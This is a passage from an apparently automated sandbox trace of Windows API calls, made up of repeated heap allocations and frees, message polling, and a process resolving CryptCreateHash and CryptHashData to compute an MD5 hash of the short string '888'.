Size=0x10) returned 0x2e50b18 [0200.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0200.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0200.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0200.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0200.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0200.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0200.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0200.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0200.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0200.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0200.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0200.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0200.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0200.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0200.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0200.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0200.408] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0200.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0200.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0200.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0200.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0200.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0200.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0200.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0200.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0200.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0200.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0200.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0200.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0200.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0200.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0200.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0200.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0200.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0200.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0200.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0200.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0200.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0200.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0200.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0200.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0200.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0200.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0200.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0200.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0200.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0200.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0200.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0200.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0200.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0200.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0200.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0200.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50a88, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0200.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0200.410] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0200.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0200.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0200.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0200.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0200.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0200.410] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0200.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0200.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0200.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0200.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0200.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0200.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0200.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0200.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0200.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0200.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0200.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0200.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0200.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0200.411] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0200.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0200.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0200.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.411] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0200.412] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0200.412] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0200.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0200.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0200.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0200.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0200.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0200.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0200.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0200.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0200.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0200.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0200.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0200.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0200.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0200.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0200.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0200.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0200.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0200.413] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0200.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0200.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0200.433] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0200.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0200.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0200.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0200.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0200.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0200.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0200.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0200.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0200.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0200.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0200.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0200.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0200.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0200.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0200.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0200.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0200.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0200.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0200.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0200.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0200.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0200.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0200.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0200.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0200.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0200.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0200.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0200.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e50a58 [0200.435] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50a58, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0200.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0200.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0200.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0200.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0200.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0200.435] CryptHashData (hHash=0xa87410, pbData=0x2e54de8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0200.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0200.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0200.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0200.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0200.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0200.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0200.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0200.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0200.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0200.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0200.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0200.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0200.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0200.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0200.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0200.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0200.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0200.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0200.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0200.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0200.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0200.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0200.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0200.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0200.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0200.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0200.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0200.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0200.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0200.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0200.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0200.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0200.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0200.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0200.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0200.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0200.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0200.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0200.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0200.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0200.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0200.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0200.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0200.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0200.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0200.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0200.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 